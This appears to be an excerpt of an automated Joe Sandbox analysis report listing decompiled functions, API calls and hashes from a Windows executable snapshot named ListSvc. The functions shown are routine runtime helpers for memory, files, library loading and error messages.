Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698

Uniqueness

Uniqueness Score: -1.00%

Function 00421230, Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}

0x00421231
0x00421233
0x00421237
0x0042123a
0x0042123f
0x00421244
0x00421245
0x0042124a
0x0042124d
0x00421250
0x00421255
0x00421256
0x0042125b
0x0042125e
0x00421269
0x0042126e
0x00421273
0x00421276
0x00421279
0x0042127e
0x00421280
0x00421283

APIs

SetErrorMode.KERNEL32 ref: 0042123A
LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574

Uniqueness

Uniqueness Score: -1.00%

Function 004052D4, Relevance: 2.6, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}

0x004052e2
0x004052f9
0x004052e7
0x004052f2
0x004052f7
0x004052f7
0x004052fd
0x00405302
0x00405307
0x00405309
0x0040530e
0x00405311
0x0040531a
0x0040531d
0x00405320
0x00405320
0x00405323
0x00405325
0x00405328
0x0040532d
0x00405332
0x00405332
0x00405334
0x00405336
0x00405336
0x00405339
0x0040533c
0x0040533c
0x00405341
0x00405352
0x00405357
0x00405359
0x0040535e
0x00405375
0x00405363
0x0040536e
0x00405373
0x00405373
0x00405379
0x0040537b
0x00405382

APIs

VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C

Uniqueness

Uniqueness Score: -1.00%

Function 004232EC, Relevance: 1.5, APIs: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}

0x004232f3
0x0042330b
0x00423313
0x00423317
0x00423320
0x00423312
0x00423312
0x00423312
0x00000000
0x00423322
0x00423322
0x00423326
0x00000000
0x00000000
0x00423326
0x00000000
0x00423320
0x00423339

APIs

FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E

Uniqueness

Uniqueness Score: -1.00%

Function 00422A18, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}

0x00422a1b
0x00422a22
0x00422a23
0x00422a28
0x00422a2b
0x00422a33
0x00422a41
0x00422a4a
0x00422a4d
0x00422a50
0x00422a5d

APIs

GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418

Uniqueness

Uniqueness Score: -1.00%

Function 00423DA8, Relevance: 1.5, APIs: 1, Instructions: 26
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}

0x00423de5
0x00423ded

APIs

CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC

Uniqueness

Uniqueness Score: -1.00%

Function 00409FA8, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}

0x00409fb0
0x00409fb2
0x00409fb6
0x00409fc6
0x00409fcf
0x00409fd4
0x00409fd6
0x00409fdb
0x00409fe0
0x00409fe0
0x00409fdb
0x00409fee

APIs

GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6

Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: FileModuleName$LibraryLoad
String ID:
API String ID: 4113206344-0
Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5

Uniqueness

Uniqueness Score: -1.00%

Function 00423ED8, Relevance: 1.5, APIs: 1, Instructions: 11
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423ED8(intOrPtr* __eax) {
				int _t4;
				intOrPtr* _t7;

				_t7 = __eax;
				_t4 = SetEndOfFile( *(__eax + 4)); // executed
				if(_t4 == 0) {
					return E00423CAC( *_t7);
				}
				return _t4;
			}

0x00423ed9
0x00423edf
0x00423ee6
0x00000000
0x00423eea
0x00423ef0

APIs

SetEndOfFile.KERNEL32(?,7FBA0010,004B6358,00000000), ref: 00423EDF

Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAA4, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CAA4() {
				intOrPtr _v16;
				struct _SYSTEM_INFO* _t3;

				GetSystemInfo(_t3); // executed
				return _v16;
			}

0x0040caa8
0x0040cab4

APIs

GetSystemInfo.KERNEL32 ref: 0040CAA8

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB

Uniqueness

Uniqueness Score: -1.00%

Function 00403BCC, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BCC(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E00403B60(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x4bbaf0 = 0;
					return 0;
				} else {
					_t10 =  *0x4bbadc; // 0x4bbad8
					_t14 = _t4;
					 *_t14 = 0x4bbad8;
					 *0x4bbadc = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x4bbaf0 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x4bbaec = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}

0x00403bce
0x00403bd0
0x00403be3
0x00403bea
0x00403c3c
0x00403c45
0x00403bec
0x00403bec
0x00403bf2
0x00403bf4
0x00403bfa
0x00403bff
0x00403c02
0x00403c06
0x00403c11
0x00403c1e
0x00403c26
0x00403c28
0x00403c35
0x00403c39
0x00403c39

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,004041E3,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000), ref: 00403BE3

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
Instruction ID: ee114c9f451a66722181258b66a673b4223530c98f306d9f720d31c7abdd50f3
Opcode Fuzzy Hash: cb8f292e3956ad7a1a5e0c92f19b435d8be5366ce3ed5ca5418bf36ecf0e0e1a
Instruction Fuzzy Hash: 71F087F2F002404FE7249F799D40742BAE8E709315B10827EE908EB799E7F488018B88

Uniqueness

Uniqueness Score: -1.00%

Function 00403CF6, Relevance: 1.3, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403CF6(void* __eax) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				void* _t13;
				int _t20;
				void* _t22;
				signed int _t26;
				signed int _t29;
				signed int _t30;
				void* _t34;
				intOrPtr _t35;
				signed int _t39;
				void* _t41;
				void* _t42;

				_push(_t29);
				_t42 = _t41 + 0xffffffdc;
				_t34 = __eax - 0x10;
				E00403C48();
				_t13 = _t34;
				 *_t42 =  *_t13;
				_v48 =  *((intOrPtr*)(_t13 + 4));
				_t26 =  *(_t13 + 0xc);
				if((_t26 & 0x00000008) != 0) {
					_t22 = _t34;
					_t39 = _t26 & 0xfffffff0;
					_t30 = 0;
					while(1) {
						VirtualQuery(_t22,  &_v44, 0x1c);
						if(VirtualFree(_t22, 0, 0x8000) == 0) {
							break;
						}
						_t35 = _v44.RegionSize;
						if(_t39 > _t35) {
							_t39 = _t39 - _t35;
							_t22 = _t22 + _t35;
							continue;
						}
						goto L10;
					}
					_t30 = _t30 | 0xffffffff;
				} else {
					_t20 = VirtualFree(_t34, 0, 0x8000); // executed
					if(_t20 == 0) {
						_t30 = _t29 | 0xffffffff;
					} else {
						_t30 = 0;
					}
				}
				L10:
				if(_t30 == 0) {
					 *_v48 =  *_t42;
					 *( *_t42 + 4) = _v48;
				}
				 *0x4bdb78 = 0;
				return _t30;
			}

0x00403cfa
0x00403cfc
0x00403d01
0x00403d04
0x00403d09
0x00403d0d
0x00403d13
0x00403d17
0x00403d1d
0x00403d39
0x00403d3d
0x00403d40
0x00403d42
0x00403d4a
0x00403d5e
0x00000000
0x00000000
0x00403d65
0x00403d6b
0x00403d6d
0x00403d6f
0x00000000
0x00403d6f
0x00000000
0x00403d6b
0x00403d60
0x00403d1f
0x00403d27
0x00403d2e
0x00403d34
0x00403d30
0x00403d30
0x00403d30
0x00403d2e
0x00403d73
0x00403d75
0x00403d7e
0x00403d87
0x00403d87
0x00403d8a
0x00403d9a

APIs

VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403D27
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00403D4A
VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00403D57

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Virtual$Free$Query
String ID:
API String ID: 778034434-0
Opcode ID: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
Instruction ID: 6789628300bf7aa479fe1b8b627d7daf3441881ad106b622f2e79b23e4dc796b
Opcode Fuzzy Hash: 70118730a538275f8eba95c50282fe5a7e92951222106072b386c800723d93a4
Instruction Fuzzy Hash: C5F06D353046005FD311DF1AC844B17BBE9EFC5711F15C67AE888973A1E635DD018796

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A928, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A928(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040A904(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040A904(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040A34C( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040A904(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040A34C(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040A34C( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040A34C(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040A34C(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}

0x0040a934
0x0040a937
0x0040a93d
0x0040a94a
0x0040a94e
0x0040a98d
0x0040a994
0x0040a9d4
0x00000000
0x0040a996
0x0040a99e
0x0040a9af
0x0040a9b5
0x0040a9bb
0x0040a9c3
0x0040a9c9
0x0040a9d7
0x0040a9d9
0x0040a9dc
0x0040a9de
0x0040a9e0
0x0040a9e0
0x0040a9e3
0x0040a9eb
0x0040a9fc
0x0040aac3
0x0040aa0e
0x0040aa12
0x0040aa14
0x0040aa16
0x0040aa18
0x0040aa18
0x0040aa23
0x0040aa33
0x0040aa37
0x0040aa39
0x0040aa3b
0x0040aa3d
0x0040aa3d
0x0040aa43
0x0040aa5b
0x0040aa62
0x0040aa68
0x0040aa84
0x0040aa86
0x0040aaad
0x0040aabf
0x0040aac1
0x00000000
0x0040aac1
0x0040aa84
0x0040aa62
0x00000000
0x0040aa23
0x0040aad9
0x0040aad9
0x0040a9eb
0x0040a9c9
0x0040a9b5
0x0040a99e
0x0040a950
0x0040a95b
0x0040a95f
0x00000000
0x0040a961
0x0040a961
0x0040a96c
0x0040a970
0x0040a975
0x00000000
0x0040a977
0x0040a983
0x0040a983
0x0040a975
0x0040a95f
0x0040aade
0x0040aae7

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,004162BC,?,?), ref: 0040A945
GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A956
FindFirstFileW.KERNEL32(?,?,kernel32.dll,004162BC,?,?), ref: 0040AA56
FindClose.KERNEL32(?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA68
lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AA74
lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,004162BC,?,?), ref: 0040AAB9

Strings

\, xrefs: 0040AA86
GetLongPathNameW, xrefs: 0040A950
kernel32.dll, xrefs: 0040A940

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
